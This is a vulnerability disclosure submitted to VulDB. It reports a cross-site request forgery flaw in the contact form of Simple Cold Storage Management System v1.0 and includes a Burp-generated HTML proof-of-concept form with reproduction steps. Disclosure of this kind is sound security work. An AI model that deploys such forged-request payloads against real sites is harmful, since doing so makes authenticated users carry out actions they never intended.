| タイトル | Simple Cold Storage Management System - CSRF in Contact Us form |
|---|
| 説明 | # Exploit Title: Simple Cold Storage Management System v1.0 - CSRF in "Contact Us"
# Exploit Author: Sourav Kumar
# Vendor Name: oretnom23
# Vendor Homepage: https://www.sourcecodester.com/php/15088/simple-cold-storage-management-system-using-phpoop-source-code.html
# Software Link: https://www.sourcecodester.com/php/15088/simple-cold-storage-management-system-using-phpoop-source-code.html
# Version: v1.0
# Tested on: Windows 11, Apache
Description:It is an attack that forces authenticated users to submit a request to a Web application against which they are currently authenticated. CSRF attacks exploit the trust a Web application has in an authenticated user.
Vulnerable Parameters:
Contact Us
Payload:
'
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/csms/classes/Master.php?f=save_message" method="POST" enctype="multipart/form-data">
<input type="hidden" name="id" value="" />
<input type="hidden" name="fullname" value="as" />
<input type="hidden" name="contact" value="885665" />
<input type="hidden" name="email" value="kittukumar267@gmail.com" />
<input type="hidden" name="message" value="seht" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Steps:
1) Go to Contact us page - http://localhost/csms/?page=contact_us
2) Now fill the form
3) Now intercept the post request with burp suite
4) Then Generate CSRF Payload PoC
5) Open the HTML Payload in browser
6) You will receive this message {"status":"success","msg":"Your message has successfully sent."}
|
|---|
| ソース | ⚠️ https://github.com/souravkr529/CSRF-in-Cold-Storage-Management-System/blob/main/PoC |
|---|
| ユーザー | Sourav529 (UID 33985) |
|---|
| 送信 | 2022年10月18日 11:14 (4 年 ago) |
|---|
| モデレーション | 2022年10月18日 11:42 (28 minutes later) |
|---|
| ステータス | 承諾済み |
|---|
| VulDBエントリ | 211194 [SourceCodester Simple Cold Storage Management System 1.0 Contact Us /csms/?page=contact_us クロスサイトリクエストフォージェリ] |
|---|
| ポイント | 20 |
|---|